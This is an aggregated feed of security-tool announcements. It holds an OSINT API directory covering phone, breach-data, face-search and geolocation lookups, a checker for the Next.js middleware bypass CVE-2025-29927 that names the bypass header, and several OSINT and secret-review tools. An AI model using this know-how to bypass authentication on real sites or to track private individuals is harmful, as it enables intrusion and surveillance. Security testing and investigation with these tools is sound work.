FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Yesterday β€” May 7th 2025KitPloit - PenTest Tools!

API-s-for-OSINT - List Of API's For Gathering Information About Phone Numbers, Addresses, Domains Etc

By: Unknown

APIs For OSINT

Β This is a Collection of APIs that will be useful for automating various tasks in OSINT.

Thank you for following me! https://cybdetective.com


    IOT/IP Search engines

    Name Link Description Price
    Shodan https://developer.shodan.io Search engine for Internet connected host and devices from $59/month
    Netlas.io https://netlas-api.readthedocs.io/en/latest/ Search engine for Internet connected host and devices. Read more at Netlas CookBook Partly FREE
    Fofa.so https://fofa.so/static_pages/api_help Search engine for Internet connected host and devices ???
    Censys.io https://censys.io/api Search engine for Internet connected host and devices Partly FREE
    Hunter.how https://hunter.how/search-api Search engine for Internet connected host and devices Partly FREE
    Fullhunt.io https://api-docs.fullhunt.io/#introduction Search engine for Internet connected host and devices Partly FREE
    IPQuery.io https://ipquery.io API for ip information such as ip risk, geolocation data, and asn details FREE

    Universal OSINT APIs

    Name Link Description Price
    Social Links https://sociallinks.io/products/sl-api Email info lookup, phone info lookup, individual and company profiling, social media tracking, dark web monitoring and more. Code example of using this API for face search in this repo PAID. Price per request

    Phone Number Lookup and Verification

    Name Link Description Price
    Numverify https://numverify.com Global Phone Number Validation & Lookup JSON API. Supports 232 countries. 250 requests FREE
    Twillo https://www.twilio.com/docs/lookup/api Provides a way to retrieve additional information about a phone number Free or $0.01 per request (for caller lookup)
    Plivo https://www.plivo.com/lookup/ Determine carrier, number type, format, and country for any phone number worldwide from $0.04 per request
    GetContact https://github.com/kovinevmv/getcontact Find info about user by phone number from $6,89 in months/100 requests
    Veriphone https://veriphone.io/ Phone number validation & carrier lookup 1000 requests/month FREE

    Address/ZIP codes lookup

    Name Link Description Price
    Global Address https://rapidapi.com/adminMelissa/api/global-address/ Easily verify, check or lookup address FREE
    US Street Address https://smartystreets.com/docs/cloud/us-street-api Validate and append data for any US postal address FREE
    Google Maps Geocoding API https://developers.google.com/maps/documentation/geocoding/overview convert addresses (like "1600 Amphitheatre Parkway, Mountain View, CA") into geographic coordinates 0.005 USD per request
    Postcoder https://postcoder.com/address-lookup Find adress by postcode Β£130/5000 requests
    Zipcodebase https://zipcodebase.com Lookup postal codes, calculate distances and much more 5000 requests FREE
    Openweathermap geocoding API https://openweathermap.org/api/geocoding-api get geographical coordinates (lat, lon) by using name of the location (city name or area name) 60 calls/minute 1,000,000 calls/month
    DistanceMatrix https://distancematrix.ai/product Calculate, evaluate and plan your routes $1.25-$2 per 1000 elements
    Geotagging API https://geotagging.ai/ Predict geolocations by texts Freemium

    People and documents verification

    Name Link Description Price
    Approuve.com https://appruve.co Allows you to verify the identities of individuals, businesses, and connect to financial account data across Africa Paid
    Onfido.com https://onfido.com Onfido Document Verification lets your users scan a photo ID from any device, before checking it's genuine. Combined with Biometric Verification, it's a seamless way to anchor an account to the real identity of a customer. India Paid
    Superpass.io https://surepass.io/passport-id-verification-api/ Passport, Photo ID and Driver License Verification in India Paid

    Business/Entity search

    Name Link Description Price
    Open corporates https://api.opencorporates.com Companies information Paid, price upon request
    Linkedin company search API https://docs.microsoft.com/en-us/linkedin/marketing/integrations/community-management/organizations/company-search?context=linkedin%2Fcompliance%2Fcontext&tabs=http Find companies using keywords, industry, location, and other criteria FREE
    Mattermark https://rapidapi.com/raygorodskij/api/Mattermark/ Get companies and investor information free 14-day trial, from $49 per month

    Domain/DNS/IP lookup

    Name Link Description Price
    API OSINT DS https://github.com/davidonzo/apiosintDS Collect info about IPv4/FQDN/URLs and file hashes in md5, sha1 or sha256 FREE
    InfoDB API https://www.ipinfodb.com/api The API returns the location of an IP address (country, region, city, zipcode, latitude, longitude) and the associated timezone in XML, JSON or plain text format FREE
    Domainsdb.info https://domainsdb.info Registered Domain Names Search FREE
    BGPView https://bgpview.docs.apiary.io/# allowing consumers to view all sort of analytics data about the current state and structure of the internet FREE
    DNSCheck https://www.dnscheck.co/api monitor the status of both individual DNS records and groups of related DNS records up to 10 DNS records/FREE
    Cloudflare Trace https://github.com/fawazahmed0/cloudflare-trace-api Get IP Address, Timestamp, User Agent, Country Code, IATA, HTTP Version, TLS/SSL Version & More FREE
    Host.io https://host.io/ Get info about domain FREE

    Mobile Apps Endpoints

    Name Link Description Price
    BeVigil OSINT API https://bevigil.com/osint-api provides access to millions of asset footprint data points including domain intel, cloud services, API information, and third party assets extracted from millions of mobile apps being continuously uploaded and scanned by users on bevigil.com 50 credits free/1000 credits/$50

    Scraping

    Name Link Description Price
    WebScraping.AI https://webscraping.ai/ Web Scraping API with built-in proxies and JS rendering FREE
    ZenRows https://www.zenrows.com/ Web Scraping API that bypasses anti-bot solutions while offering JS rendering, and rotating proxies apiKey Yes Unknown FREE

    Whois

    Name Link Description Price
    Whois freaks https://whoisfreaks.com/ well-parsed and structured domain WHOIS data for all domain names, registrars, countries and TLDs since the birth of internet $19/5000 requests
    WhoisXMLApi https://whois.whoisxmlapi.com gathers a variety of domain ownership and registration data points from a comprehensive WHOIS database 500 requests in month/FREE
    IPtoWhois https://www.ip2whois.com/developers-api Get detailed info about a domain 500 requests/month FREE

    GEO IP

    Name Link Description Price
    Ipstack https://ipstack.com Detect country, region, city and zip code FREE
    Ipgeolocation.io https://ipgeolocation.io provides country, city, state, province, local currency, latitude and longitude, company detail, ISP lookup, language, zip code, country calling code, time zone, current time, sunset and sunrise time, moonset and moonrise 30 000 requests per month/FREE
    IPInfoDB https://ipinfodb.com/api Free Geolocation tools and APIs for country, region, city and time zone lookup by IP address FREE
    IP API https://ip-api.com/ Free domain/IP geolocation info FREE

    Wi-fi lookup

    Name Link Description Price
    Mylnikov API https://www.mylnikov.org public API implementation of Wi-Fi Geo-Location database FREE
    Wigle https://api.wigle.net/ get location and other information by SSID FREE

    Network

    Name Link Description Price
    PeetingDB https://www.peeringdb.com/apidocs/ Database of networks, and the go-to location for interconnection data FREE
    PacketTotal https://packettotal.com/api.html .pcap files analyze FREE

    Finance

    Name Link Description Price
    Binlist.net https://binlist.net/ get information about bank by BIN FREE
    FDIC Bank Data API https://banks.data.fdic.gov/docs/ institutions, locations and history events FREE
    Amdoren https://www.amdoren.com/currency-api/ Free currency API with over 150 currencies FREE
    VATComply.com https://www.vatcomply.com/documentation Exchange rates, geolocation and VAT number validation FREE
    Alpaca https://alpaca.markets/docs/api-documentation/api-v2/market-data/alpaca-data-api-v2/ Realtime and historical market data on all US equities and ETFs FREE
    Swiftcodesapi https://swiftcodesapi.com Verifying the validity of a bank SWIFT code or IBAN account number $39 per month/4000 swift lookups
    IBANAPI https://ibanapi.com Validate IBAN number and get bank account information from it Freemium/10$ Starter plan

    Email

    Name Link Description Price
    EVA https://eva.pingutil.com/ Measuring email deliverability & quality FREE
    Mailboxlayer https://mailboxlayer.com/ Simple REST API measuring email deliverability & quality 100 requests FREE, 5000 requests in month β€” $14.49
    EmailCrawlr https://emailcrawlr.com/ Get key information about company websites. Find all email addresses associated with a domain. Get social accounts associated with an email. Verify email address deliverability. 200 requests FREE, 5000 requets β€” $40
    Voila Norbert https://www.voilanorbert.com/api/ Find anyone's email address and ensure your emails reach real people from $49 in month
    Kickbox https://open.kickbox.com/ Email verification API FREE
    FachaAPI https://api.facha.dev/ Allows checking if an email domain is a temporary email domain FREE

    Names/Surnames

    Name Link Description Price
    Genderize.io https://genderize.io Instantly answers the question of how likely a certain name is to be male or female and shows the popularity of the name. 1000 names/day free
    Agify.io https://agify.io Predicts the age of a person given their name 1000 names/day free
    Nataonalize.io https://nationalize.io Predicts the nationality of a person given their name 1000 names/day free

    Pastebin/Leaks

    Name Link Description Price
    HaveIBeenPwned https://haveibeenpwned.com/API/v3 allows the list of pwned accounts (email addresses and usernames) $3.50 per month
    Psdmp.ws https://psbdmp.ws/api search in Pastebin $9.95 per 10000 requests
    LeakPeek https://psbdmp.ws/api searc in leaks databases $9.99 per 4 weeks unlimited access
    BreachDirectory.com https://breachdirectory.com/api_documentation search domain in data breaches databases FREE
    LeekLookup https://leak-lookup.com/api search domain, email_address, fullname, ip address, phone, password, username in leaks databases 10 requests FREE
    BreachDirectory.org https://rapidapi.com/rohan-patra/api/breachdirectory/pricing search domain, email_address, fullname, ip address, phone, password, username in leaks databases (possible to view password hashes) 50 requests in month/FREE

    Archives

    Name Link Description Price
    Wayback Machine API (Memento API, CDX Server API, Wayback Availability JSON API) https://archive.org/help/wayback_api.php Retrieve information about Wayback capture data FREE
    TROVE (Australian Web Archive) API https://trove.nla.gov.au/about/create-something/using-api Retrieve information about TROVE capture data FREE
    Archive-it API https://support.archive-it.org/hc/en-us/articles/115001790023-Access-Archive-It-s-Wayback-index-with-the-CDX-C-API Retrieve information about archive-it capture data FREE
    UK Web Archive API https://ukwa-manage.readthedocs.io/en/latest/#api-reference Retrieve information about UK Web Archive capture data FREE
    Arquivo.pt API https://github.com/arquivo/pwa-technologies/wiki/Arquivo.pt-API Allows full-text search and access preserved web content and related metadata. It is also possible to search by URL, accessing all versions of preserved web content. API returns a JSON object. FREE
    Library Of Congress archive API https://www.loc.gov/apis/ Provides structured data about Library of Congress collections FREE
    BotsArchive https://botsarchive.com/docs.html JSON formatted details about Telegram Bots available in database FREE

    Hashes decrypt/encrypt

    Name Link Description Price
    MD5 Decrypt https://md5decrypt.net/en/Api/ Search for decrypted hashes in the database 1.99 EURO/day

    Crypto

    Name Link Description Price
    BTC.com https://btc.com/btc/adapter?type=api-doc get information about addresses and transanctions FREE
    Blockchair https://blockchair.com Explore data stored on 17 blockchains (BTC, ETH, Cardano, Ripple etc) $0.33 - $1 per 1000 calls
    Bitcointabyse https://www.bitcoinabuse.com/api-docs Lookup bitcoin addresses that have been linked to criminal activity FREE
    Bitcoinwhoswho https://www.bitcoinwhoswho.com/api Scam reports on the Bitcoin Address FREE
    Etherscan https://etherscan.io/apis Ethereum explorer API FREE
    apilayer coinlayer https://coinlayer.com Real-time Crypto Currency Exchange Rates FREE
    BlockFacts https://blockfacts.io/ Real-time crypto data from multiple exchanges via a single unified API, and much more FREE
    Brave NewCoin https://bravenewcoin.com/developers Real-time and historic crypto data from more than 200+ exchanges FREE
    WorldCoinIndex https://www.worldcoinindex.com/apiservice Cryptocurrencies Prices FREE
    WalletLabels https://www.walletlabels.xyz/docs Labels for 7,5 million Ethereum wallets FREE

    Malware

    Name Link Description Price
    VirusTotal https://developers.virustotal.com/reference files and urls analyze Public API is FREE
    AbuseLPDB https://docs.abuseipdb.com/#introduction IP/domain/URL reputation FREE
    AlienVault Open Threat Exchange (OTX) https://otx.alienvault.com/api IP/domain/URL reputation FREE
    Phisherman https://phisherman.gg IP/domain/URL reputation FREE
    URLScan.io https://urlscan.io/about-api/ Scan and Analyse URLs FREE
    Web of Thrust https://support.mywot.com/hc/en-us/sections/360004477734-API- IP/domain/URL reputation FREE
    Threat Jammer https://threatjammer.com/docs/introduction-threat-jammer-user-api IP/domain/URL reputation ???

    Face Search

    Name Link Description Price
    Search4faces https://search4faces.com/api.html Detect and locate human faces within an image, and returns high-precision face bounding boxes. Face⁺⁺ also allows you to store metadata of each detected face for future use. $21 per 1000 requests

    ## Face Detection

    Name Link Description Price
    Face++ https://www.faceplusplus.com/face-detection/ Search for people in social networks by facial image from 0.03 per call
    BetaFace https://www.betafaceapi.com/wpa/ Can scan uploaded image files or image URLs, find faces and analyze them. API also provides verification (faces comparison) and identification (faces search) services, as well able to maintain multiple user-defined recognition databases (namespaces) 50 image per day FREE/from 0.15 EUR per request

    ## Reverse Image Search

    Name Link Description Price
    Google Reverse images search API https://github.com/SOME-1HING/google-reverse-image-api/ This is a simple API built using Node.js and Express.js that allows you to perform Google Reverse Image Search by providing an image URL. FREE (UNOFFICIAL)
    TinEyeAPI https://services.tineye.com/TinEyeAPI Verify images, Moderate user-generated content, Track images and brands, Check copyright compliance, Deploy fraud detection solutions, Identify stock photos, Confirm the uniqueness of an image Start from $200/5000 searches
    Bing Images Search API https://www.microsoft.com/en-us/bing/apis/bing-image-search-api With Bing Image Search API v7, help users scour the web for images. Results include thumbnails, full image URLs, publishing website info, image metadata, and more. 1,000 requests free per month FREE
    MRISA https://github.com/vivithemage/mrisa MRISA (Meta Reverse Image Search API) is a RESTful API which takes an image URL, does a reverse Google image search, and returns a JSON array with the search results FREE? (no official)
    PicImageSearch https://github.com/kitUIN/PicImageSearch Aggregator for different Reverse Image Search API FREE? (no official)

    ## AI Geolocation

    Name Link Description Price
    Geospy https://api.geospy.ai/ Detecting estimation location of uploaded photo Access by request
    Picarta https://picarta.ai/api Detecting estimation location of uploaded photo 100 request/day FREE

    Social Media and Messengers

    Name Link Description Price
    Twitch https://dev.twitch.tv/docs/v5/reference
    YouTube Data API https://developers.google.com/youtube/v3
    Reddit https://www.reddit.com/dev/api/
    Vkontakte https://vk.com/dev/methods
    Twitter API https://developer.twitter.com/en
    Linkedin API https://docs.microsoft.com/en-us/linkedin/
    All Facebook and Instagram API https://developers.facebook.com/docs/
    Whatsapp Business API https://www.whatsapp.com/business/api
    Telegram and Telegram Bot API https://core.telegram.org
    Weibo API https://open.weibo.com/wiki/APIζ–‡ζ‘£/en
    XING https://dev.xing.com/partners/job_integration/api_docs
    Viber https://developers.viber.com/docs/api/rest-bot-api/
    Discord https://discord.com/developers/docs
    Odnoklassniki https://ok.ru/apiok
    Blogger https://developers.google.com/blogger/ The Blogger APIs allows client applications to view and update Blogger content FREE
    Disqus https://disqus.com/api/docs/auth/ Communicate with Disqus data FREE
    Foursquare https://developer.foursquare.com/ Interact with Foursquare users and places (geolocation-based checkins, photos, tips, events, etc) FREE
    HackerNews https://github.com/HackerNews/API Social news for CS and entrepreneurship FREE
    Kakao https://developers.kakao.com/ Kakao Login, Share on KakaoTalk, Social Plugins and more FREE
    Line https://developers.line.biz/ Line Login, Share on Line, Social Plugins and more FREE
    TikTok https://developers.tiktok.com/doc/login-kit-web Fetches user info and user's video posts on TikTok platform FREE
    Tumblr https://www.tumblr.com/docs/en/api/v2 Read and write Tumblr Data FREE

    UNOFFICIAL APIs

    !WARNING Use with caution! Accounts may be blocked permanently for using unofficial APIs.

    Name Link Description Price
    TikTok https://github.com/davidteather/TikTok-Api The Unofficial TikTok API Wrapper In Python FREE
    Google Trends https://github.com/suryasev/unofficial-google-trends-api Unofficial Google Trends API FREE
    YouTube Music https://github.com/sigma67/ytmusicapi Unofficial APi for YouTube Music FREE
    Duolingo https://github.com/KartikTalwar/Duolingo Duolingo unofficial API (can gather info about users) FREE
    Steam. https://github.com/smiley/steamapi An unofficial object-oriented Python library for accessing the Steam Web API. FREE
    Instagram https://github.com/ping/instagram_private_api Instagram Private API FREE
    Discord https://github.com/discordjs/discord.js JavaScript library for interacting with the Discord API FREE
    Zhihu https://github.com/syaning/zhihu-api FREE Unofficial API for Zhihu FREE
    Quora https://github.com/csu/quora-api Unofficial API for Quora FREE
    DnsDumbster https://github.com/PaulSec/API-dnsdumpster.com (Unofficial) Python API for DnsDumbster FREE
    PornHub https://github.com/sskender/pornhub-api Unofficial API for PornHub in Python FREE
    Skype https://github.com/ShyykoSerhiy/skyweb Unofficial Skype API for nodejs via 'Skype (HTTP)' protocol. FREE
    Google Search https://github.com/aviaryan/python-gsearch Google Search unofficial API for Python with no external dependencies FREE
    Airbnb https://github.com/nderkach/airbnb-python Python wrapper around the Airbnb API (unofficial) FREE
    Medium https://github.com/enginebai/PyMedium Unofficial Medium Python Flask API and SDK FREE
    Facebook https://github.com/davidyen1124/Facebot Powerful unofficial Facebook API FREE
    Linkedin https://github.com/tomquirk/linkedin-api Unofficial Linkedin API for Python FREE
    Y2mate https://github.com/Simatwa/y2mate-api Unofficial Y2mate API for Python FREE
    Livescore https://github.com/Simatwa/livescore-api Unofficial Livescore API for Python FREE

    Search Engines

    Name Link Description Price
    Google Custom Search JSON API https://developers.google.com/custom-search/v1/overview Search in Google 100 requests FREE
    Serpstack https://serpstack.com/ Google search results to JSON FREE
    Serpapi https://serpapi.com Google, Baidu, Yandex, Yahoo, DuckDuckGo, Bint and many others search results $50/5000 searches/month
    Bing Web Search API https://www.microsoft.com/en-us/bing/apis/bing-web-search-api Search in Bing (+instant answers and location) 1000 transactions per month FREE
    WolframAlpha API https://products.wolframalpha.com/api/pricing/ Short answers, conversations, calculators and many more from $25 per 1000 queries
    DuckDuckgo Instant Answers API https://duckduckgo.com/api An API for some of our Instant Answers, not for full search results. FREE

    | Memex Marginalia | https://memex.marginalia.nu/projects/edge/api.gmi | An API for new privacy search engine | FREE |

    News analyze

    Name Link Description Price
    MediaStack https://mediastack.com/ News articles search results in JSON 500 requests/month FREE

    Darknet

    Name Link Description Price
    Darksearch.io https://darksearch.io/apidoc search by websites in .onion zone FREE
    Onion Lookup https://onion.ail-project.org/ onion-lookup is a service for checking the existence of Tor hidden services and retrieving their associated metadata. onion-lookup relies on an private AIL instance to obtain the metadata FREE

    Torrents/file sharing

    Name Link Description Price
    Jackett https://github.com/Jackett/Jackett API for automate searching in different torrent trackers FREE
    Torrents API PY https://github.com/Jackett/Jackett Unofficial API for 1337x, Piratebay, Nyaasi, Torlock, Torrent Galaxy, Zooqle, Kickass, Bitsearch, MagnetDL,Libgen, YTS, Limetorrent, TorrentFunk, Glodls, Torre FREE
    Torrent Search API https://github.com/Jackett/Jackett API for Torrent Search Engine with Extratorrents, Piratebay, and ISOhunt 500 queries/day FREE
    Torrent search api https://github.com/JimmyLaurent/torrent-search-api Yet another node torrent scraper (supports iptorrents, torrentleech, torrent9, torrentz2, 1337x, thepiratebay, Yggtorrent, TorrentProject, Eztv, Yts, LimeTorrents) FREE
    Torrentinim https://github.com/sergiotapia/torrentinim Very low memory-footprint, self hosted API-only torrent search engine. Sonarr + Radarr Compatible, native support for Linux, Mac and Windows. FREE

    Vulnerabilities

    Name Link Description Price
    National Vulnerability Database CVE Search API https://nvd.nist.gov/developers/vulnerabilities Get basic information about CVE and CVE history FREE
    OpenCVE API https://docs.opencve.io/api/cve/ Get basic information about CVE FREE
    CVEDetails API https://www.cvedetails.com/documentation/apis Get basic information about CVE partly FREE (?)
    CVESearch API https://docs.cvesearch.com/ Get basic information about CVE by request
    KEVin API https://kevin.gtfkd.com/ API for accessing CISA's Known Exploited Vulnerabilities Catalog (KEV) and CVE Data FREE
    Vulners.com API https://vulners.com Get basic information about CVE FREE for personal use

    Flights

    Name Link Description Price
    Aviation Stack https://aviationstack.com get information about flights, aircrafts and airlines FREE
    OpenSky Network https://opensky-network.org/apidoc/index.html Free real-time ADS-B aviation data FREE
    AviationAPI https://docs.aviationapi.com/ FAA Aeronautical Charts and Publications, Airport Information, and Airport Weather FREE
    FachaAPI https://api.facha.dev Aircraft details and live positioning API FREE

    Webcams

    Name Link Description Price
    Windy Webcams API https://api.windy.com/webcams/docs Get a list of available webcams for a country, city or geographical coordinates FREE with limits or 9990 euro without limits

    ## Regex

    Name Link Description Price
    Autoregex https://autoregex.notion.site/AutoRegex-API-Documentation-97256bad2c114a6db0c5822860214d3a Convert English phrase to regular expression from $3.49/month

    API testing tools

    Name Link
    API Guessr (detect API by auth key or by token) https://api-guesser.netlify.app/
    REQBIN Online REST & SOAP API Testing Tool https://reqbin.com
    ExtendClass Online REST Client https://extendsclass.com/rest-client-online.html
    Codebeatify.org Online API Test https://codebeautify.org/api-test
    SyncWith Google Sheet add-on. Link more than 1000 APIs with Spreadsheet https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget
    Talend API Tester Google Chrome Extension https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget
    Michael Bazzel APIs search tools https://inteltechniques.com/tools/API.html

    Curl converters (tools that help to write code using API queries)

    Name Link
    Convert curl commands to Python, JavaScript, PHP, R, Go, C#, Ruby, Rust, Elixir, Java, MATLAB, Dart, CFML, Ansible URI or JSON https://curlconverter.com
    Curl-to-PHP. Instantly convert curl commands to PHP code https://incarnate.github.io/curl-to-php/
    Curl to PHP online (Codebeatify) https://codebeautify.org/curl-to-php-online
    Curl to JavaScript fetch https://kigiri.github.io/fetch/
    Curl to JavaScript fetch (Scrapingbee) https://www.scrapingbee.com/curl-converter/javascript-fetch/
    Curl to C# converter https://curl.olsh.me

    Create your own API

    Name Link
    Sheety. Create API frome GOOGLE SHEET https://sheety.co/
    Postman. Platform for creating your own API https://www.postman.com
    Reetoo. Rest API Generator https://retool.com/api-generator/
    Beeceptor. Rest API mocking and intercepting in seconds (no coding). https://beeceptor.com

    Distribute your own API

    Name Link
    RapidAPI. Market your API for millions of developers https://rapidapi.com/solution/api-provider/
    Apilayer. API Marketplace https://apilayer.com

    API Keys Info

    Name Link Description
    Keyhacks https://github.com/streaak/keyhacks Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
    All about APIKey https://github.com/daffainfo/all-about-apikey Detailed information about API key / OAuth token for different services (Description, Request, Response, Regex, Example)
    API Guessr https://api-guesser.netlify.app/ Enter API Key and and find out which service they belong to

    API directories

    If you don't find what you need, try searching these directories.

    Name Link Description
    APIDOG ApiHub https://apidog.com/apihub/
    Rapid APIs collection https://rapidapi.com/collections
    API Ninjas https://api-ninjas.com/api
    APIs Guru https://apis.guru/
    APIs List https://apislist.com/
    API Context Directory https://apicontext.com/api-directory/
    Any API https://any-api.com/
    Public APIs Github repo https://github.com/public-apis/public-apis

    How to learn how to work with REST API?

    If you don't know how to work with the REST API, I recommend you check out the Netlas API guide I wrote for Netlas.io.

    Netlas Cookbook

    There it is very brief and accessible to write how to automate requests in different programming languages (focus on Python and Bash) and process the resulting JSON data.

    Thank you for following me! https://cybdetective.com



    Before yesterdayKitPloit - PenTest Tools!

    Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927)

    By: Unknown


    A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).

    The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by send a custom header x-middleware-subrequest.

    Next JS versions affected: - 11.1.4 and up

    [!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.

    Β 

    Installation

    Clone the repo

    git clone https://github.com/takumade/ghost-route.git
    cd ghost-route

    Create and activate virtual environment

    python -m venv .venv
    source .venv/bin/activate

    Install dependencies

    pip install -r requirements.txt

    Usage

    python ghost-route.py <url> <path> <show_headers>
    • <url>: Base URL of the Next.js site (e.g., https://example.com)
    • <path>: Protected path to test (default: /admin)
    • <show_headers>: Show response headers (default: False)

    Example

    Basic Example

    python ghost-route.py https://example.com /admin

    Show Response Headers

    python ghost-route.py https://example.com /admin True

    License

    MIT License

    Credits



    Maryam - Open-source Intelligence(OSINT) Framework

    By: Unknown


    OWASP Maryam is a modular open-source framework based on OSINT and data gathering. It is designed to provide a robust environment to harvest data from open sources and search engines quickly and thoroughly.


    Installation

    Supported OS

    • Linux
    • FreeBSD
    • Darwin
    • OSX
    $ pip install maryam

    Alternatively, you can install the latest version with the following command (Recommended):

    pip install git+https://github.com/saeeddhqan/maryam.git

    Usage

    # Using dns_search. --max means all of resources. --api shows the results as json.
    # .. -t means use multi-threading.
    maryam -e dns_search -d ibm.com -t 5 --max --api --form
    # Using youtube. -q means query
    maryam -e youtube -q "<QUERY>"
    maryam -e google -q "<QUERY>"
    maryam -e dnsbrute -d domain.tld
    # Show framework modules
    maryam -e show modules
    # Set framework options.
    maryam -e set proxy ..
    maryam -e set agent ..
    maryam -e set timeout ..
    # Run web API
    maryam -e web api 127.0.0.1 1313

    Contribution

    Here is a start guide: Development Guide You can add a new search engine to the util classes or use the current search engines to write a new module. The best help to write a new module is checking the current modules.

    Roadmap

    • Write a language model based search

    Links

    OWASP

    Wiki

    Install

    Modules Guide

    Development Guide

    To report bugs, requests, or any other issues please create an issue.



    TruffleHog Explorer - A User-Friendly Web-Based Tool To Visualize And Analyze Data Extracted Using TruffleHog

    By: Unknown


    Welcome toΒ TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful secrets discovery, classification, validation, and analysis open source tool. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more.

    With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories.

    ⚠️ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms.

    You can use online version here: TruffleHog Explorer


    πŸš€ Features

    • Intuitive UI/UX: Beautiful pastel theme with smooth navigation.
    • Powerful Filtering:
    • Filter findings by repository, detector type, and uploaded file.
    • Flexible date range selection with a calendar picker.
    • Verification status categorization for effective review.
    • Advanced search capabilities for faster identification.
    • Batch Operations:
    • Verify or reject multiple findings with a single click.
    • Toggle visibility of rejected results for a streamlined view.
    • Bulk processing to manage large datasets efficiently.
    • Export Capabilities:
    • Export verified secrets or filtered findings effortlessly.
    • Save and load session backups for continuity.
    • Generate reports in multiple formats (JSON, CSV).
    • Dynamic Sorting:
    • Sort results by repository, date, or verification status.
    • Customizable sorting preferences for a personalized experience.

    πŸ“₯ Installation & Usage

    1. Clone the Repository

    $ git clone https://github.com/yourusername/trufflehog-explorer.git
    $ cd trufflehog-explorer

    2. Open the index.html

    Simply open the index.html file in your preferred web browser.

    $ open index.html

    πŸ“‚ How to Use

    1. Upload TruffleHog JSON Findings:
    2. Click on the "Load Data" section and select your .json files from TruffleHog output.
    3. Multiple files are supported.
    4. Apply Filters:
    5. Choose filters such as repository, detector type, and verification status.
    6. Utilize the date range picker to narrow down findings.
    7. Leverage the search function to locate specific findings quickly.
    8. Review Findings:
    9. Click on a finding to expand and view its details.
    10. Use the action buttons to verify or reject findings.
    11. Add comments and annotations for better tracking.
    12. Export Results:
    13. Export verified or filtered findings for reporting.
    14. Save session data for future review and analysis.
    15. Save Your Progress:
    16. Save your session and resume later without losing any progress.
    17. Automatic backup feature to prevent data loss.

    Happy Securing! πŸ”’



    PANO - Advanced OSINT Investigation Platform Combining Graph Visualization, Timeline Analysis, And AI Assistance To Uncover Hidden Connections In Data

    By: Unknown


    PANO is a powerful OSINT investigation platform that combines graph visualization, timeline analysis, and AI-powered tools to help you uncover hidden connections and patterns in your data.

    Getting Started

    1. Clone the repository: bash git clone https://github.com/ALW1EZ/PANO.git cd PANO

    2. Run the application:

    3. Linux: ./start_pano.sh
    4. Windows: start_pano.bat

    The startup script will automatically: - Check for updates - Set up the Python environment - Install dependencies - Launch PANO

    In order to use Email Lookup transform You need to login with GHunt first. After starting the pano via starter scripts;

    1. Select venv manually
    2. Linux: source venv/bin/activate
    3. Windows: call venv\Scripts\activate
    4. See how to login here

    πŸ’‘ Quick Start Guide

    1. Create Investigation: Start a new investigation or load an existing one
    2. Add Entities: Drag entities from the sidebar onto the graph
    3. Discover Connections: Use transforms to automatically find relationships
    4. Analyze: Use timeline and map views to understand patterns
    5. Save: Export your investigation for later use

    πŸ” Features

    πŸ•ΈοΈ Core Functionality

    • Interactive Graph Visualization
    • Drag-and-drop entity creation
    • Multiple layout algorithms (Circular, Hierarchical, Radial, Force-Directed)
    • Dynamic relationship mapping
    • Visual node and edge styling

    • Timeline Analysis

    • Chronological event visualization
    • Interactive timeline navigation
    • Event filtering and grouping
    • Temporal relationship analysis

    • Map Integration

    • Geographic data visualization
    • Location-based analysis
    • Interactive mapping features
    • Coordinate plotting and tracking

    🎯 Entity Management

    • Supported Entity Types
    • πŸ“§ Email addresses
    • πŸ‘€ Usernames
    • 🌐 Websites
    • πŸ–ΌοΈ Images
    • πŸ“ Locations
    • ⏰ Events
    • πŸ“ Text content
    • πŸ”§ Custom entity types

    πŸ”„ Transform System

    • Email Analysis
    • Google account investigation
    • Calendar event extraction
    • Location history analysis
    • Connected services discovery

    • Username Analysis

    • Cross-platform username search
    • Social media profile discovery
    • Platform correlation
    • Web presence analysis

    • Image Analysis

    • Reverse image search
    • Visual content analysis
    • Metadata extraction
    • Related image discovery

    πŸ€– AI Integration

    • PANAI
    • Natural language investigation assistant
    • Automated entity extraction and relationship mapping
    • Pattern recognition and anomaly detection
    • Multi-language support
    • Context-aware suggestions
    • Timeline and graph analysis

    🧩 Core Components

    πŸ“¦ Entities

    Entities are the fundamental building blocks of PANO. They represent distinct pieces of information that can be connected and analyzed:

    • Built-in Types
    • πŸ“§ Email: Email addresses with service detection
    • πŸ‘€ Username: Social media and platform usernames
    • 🌐 Website: Web pages with metadata
    • πŸ–ΌοΈ Image: Images with EXIF and analysis
    • πŸ“ Location: Geographic coordinates and addresses
    • ⏰ Event: Time-based occurrences
    • πŸ“ Text: Generic text content

    • Properties System

    • Type-safe property validation
    • Automatic property getters
    • Dynamic property updates
    • Custom property types
    • Metadata support

    ⚑ Transforms

    Transforms are automated operations that process entities to discover new information and relationships:

    • Operation Types
    • πŸ” Discovery: Find new entities from existing ones
    • πŸ”— Correlation: Connect related entities
    • πŸ“Š Analysis: Extract insights from entity data
    • 🌐 OSINT: Gather open-source intelligence
    • πŸ”„ Enrichment: Add data to existing entities

    • Features

    • Async operation support
    • Progress tracking
    • Error handling
    • Rate limiting
    • Result validation

    πŸ› οΈ Helpers

    Helpers are specialized tools with dedicated UIs for specific investigation tasks:

    • Available Helpers
    • πŸ” Cross-Examination: Analyze statements and testimonies
    • πŸ‘€ Portrait Creator: Generate facial composites
    • πŸ“Έ Media Analyzer: Advanced image processing and analysis
    • πŸ” Base Searcher: Search near places of interest
    • πŸ”„ Translator: Translate text between languages

    • Helper Features

    • Custom Qt interfaces
    • Real-time updates
    • Graph integration
    • Data visualization
